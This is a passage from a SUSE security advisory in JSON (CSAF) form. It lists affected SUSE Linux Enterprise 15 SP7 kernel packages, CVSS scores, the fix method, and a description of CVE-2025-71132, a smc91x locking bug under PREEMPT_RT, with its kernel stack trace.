"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71131"
},
{
"cve": "CVE-2025-71132",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71132"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmc91x: fix broken irq-context in PREEMPT_RT\n\nWhen smc91x.c is built with PREEMPT_RT, the following splat occurs\nin FVP_RevC:\n\n[ 13.055000] smc91x LNRO0003:00 eth0: link up, 10Mbps, half-duplex, lpa 0x0000\n[ 13.062137] BUG: workqueue leaked atomic, lock or RCU: kworker/2:1[106]\n[ 13.062137] preempt=0x00000000 lock=0-\u003e0 RCU=0-\u003e1 workfn=mld_ifc_work\n[ 13.062266] C\n** replaying previous printk message **\n[ 13.062266] CPU: 2 UID: 0 PID: 106 Comm: kworker/2:1 Not tainted 6.18.0-dirty #179 PREEMPT_{RT,(full)}\n[ 13.062353] Hardware name: , BIOS\n[ 13.062382] Workqueue: mld mld_ifc_work\n[ 13.062469] Call trace:\n[ 13.062494] show_stack+0x24/0x40 (C)\n[ 13.062602] __dump_stack+0x28/0x48\n[ 13.062710] dump_stack_lvl+0x7c/0xb0\n[ 13.062818] dump_stack+0x18/0x34\n[ 13.062926] process_scheduled_works+0x294/0x450\n[ 13.063043] worker_thread+0x260/0x3d8\n[ 13.063124] kthread+0x1c4/0x228\n[ 13.063235] ret_from_fork+0x10/0x20\n\nThis happens because smc_special_trylock() disables IRQs even on PREEMPT_RT,\nbut smc_special_unlock() does not restore IRQs on PREEMPT_RT.\nThe reason is that smc_special_unlock() calls spin_unlock_irqrestore(),\nand rcu_read_unlock_bh() in __dev_queue_xmit() cannot invoke\nrcu_read_unlock() through __local_bh_enable_ip() when current-\u003esoftirq_disable_cnt becomes zero.\n\nTo address this issue, replace smc_special_trylock() with spin_trylock_irqsave().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71132",
"url": "https://www.suse.com/security/cve/CVE-2025-71132"
},
{
"category": "external",
"summary": "SUSE Bug 1256737 for CVE-2025-71132",
"url": "https://bugzilla.suse.com/1256737"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
